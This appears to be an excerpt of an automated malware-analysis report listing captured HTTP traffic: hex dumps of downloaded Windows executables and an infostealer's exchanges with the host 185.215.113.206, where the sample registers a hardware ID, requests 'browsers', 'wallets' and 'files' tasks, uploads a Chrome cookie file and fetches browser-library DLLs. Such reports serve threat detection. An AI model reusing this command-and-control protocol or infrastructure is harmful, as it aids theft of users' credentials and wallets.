00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 06:09:56 GMTContent-Type: application/octet-streamContent-Length: 1931776Last-Modified: Sat, 23 Nov 2024 06:06:24 GMTConnection: keep-aliveETag: "674170e0-1d7a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 80 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4c 00 00 04 00 00 5a 84 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 6b 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6b 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 90 06 00 00 06 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2b 00 00 b0 06 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 78 6b 79 79 77 69 6f 00 60 1a 00 00 10 32 00 00 5c 1a 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 61 6e 70 71 6e 73 79 00 10 00 00 00 70 4c 00 00 04 00 00 00 54 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 4c 00 00 22 00 00 00 58 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 06:11:10 GMTContent-Type: application/octet-streamContent-Length: 4416000Last-Modified: Sat, 23 Nov 2024 05:31:14 GMTConnection: keep-aliveETag: "674168a2-436200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 70 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 a0 c5 00 00 04 00 00 d6 bd 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 5d c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 5d c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6b 6c 6e 65 64 69 70 00 b0 1b 00 00 b0 a9 00 00 ae 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 65 70 62 6d 69 64 6a 00 10 00 00 00 60 c5 00 00 06 00 00 00 3a 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 c5 00 00 22 00 00 00 40 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 42 38 43 44 45 41 36 31 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 2d 2d 0d 0a Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="hwid"CFB8CDEA61BD3120641781------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="build"mars------EHCBAAAFHJDHJJKEBGHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="message"browsers------AKECBFBAEBKJJJJKFCGC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="message"plugins------CGIDGCGIEGDGDGDGHJKK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 2d 2d 0d 0a Data Ascii: ------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="message"fplugins------FBKJKEHIJECGCBFIJEGI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.206Content-Length: 5975Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IJDHDGDAAAAKFIDGHJDG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBGHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="file"------FHCGHJDBFIIDGDHIJDBG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHIHost: 185.215.113.206Content-Length: 3083Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file"------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="message"wallets------GIJKKKFCFHCFIECBGDHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 2d 2d 0d 0a Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="message"files------DGDAEHCBGIIJJJJKKKEH--
